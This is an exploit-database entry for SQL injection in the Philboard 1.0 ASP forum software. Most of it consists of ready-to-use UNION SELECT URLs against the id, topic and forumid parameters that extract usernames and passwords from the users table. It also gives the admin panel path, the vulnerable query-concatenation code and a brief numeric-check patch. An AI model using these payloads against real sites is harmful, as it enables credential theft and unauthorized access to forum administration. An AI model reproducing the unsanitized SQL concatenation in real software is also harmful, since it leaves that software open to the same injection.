W1L3D4 Philboard 1.0 (philboard_reply.asp) SQL Injection Vulnerability

2008-04-20T00:00:00
ID 1337DAY-ID-2901
Type zdt
Reporter U238
Modified 2008-04-20T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ======================================================================
W1L3D4 Philboard 1.0 (philboard_reply.asp) SQL Injection Vulnerability
======================================================================



Philboard W1L3D4 v1.0  Multiple SQL Injection Vulnerable

Author : U238 

Script2: http://rapidshare.de/files/39107179/philboardtrge.zip.html

-_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_


[0x1] Exploit:

http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,username,1,9,0,1,2+from+users

http://localhost:2222/lab/philboard/philboard_reply.asp?id=1+union+select+0,1,2,3,4,5,6,7,8,password,1,9,0,1,2+from+users

*
http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,username,2,3,4,5,6+from+users

http://localhost:2222/lab/philboard/philboard_reply.asp?topic=1+union+select+0,password,2,3,4,5,6+from+users



-----------------------


http://localhost:2222/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,password,2,3,4,5+from+users

http://localhost:2222/lab/philboard/philboard_newtopic.asp?forumid=1+union+select+0,username,2,3,4,5+from+users


-_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_--_--_-_-

[0x2] Admin Panel


target/philboard/philboard_admin.asp





[0x3] Error File : 

philboard_newtopic.asp

philboard_reply.asp


[0x3] Error Code : 


id = Request.QueryString("id")

recordnum = Request.QueryString("recordnum")

sql = "SELECT replies.*, forums.*, topics.locked FROM (forums INNER JOIN topics ON forums.forumid = topics.forum) INNER JOIN replies ON topics.id = replies.root WHERE replies.id = " & id




                                     [-] Patched ? [-] 

id = Request.QueryString("id")
IF Not IsNumeric(request.querystring("id")) THEN
Response.write "sql injection mu ar?yon yawrucum,anam? !!" 
Response.End
END IF

* This Code  , application make to included error file.. 




------------------------------
[0x4] Greatz: The_BekiR - ka0x - Ferruh Mavituna - fahn - sersak

[0x5] U238 | Web - Designer Developer Solutions

-----------------------------



#  0day.today [2018-04-13]  #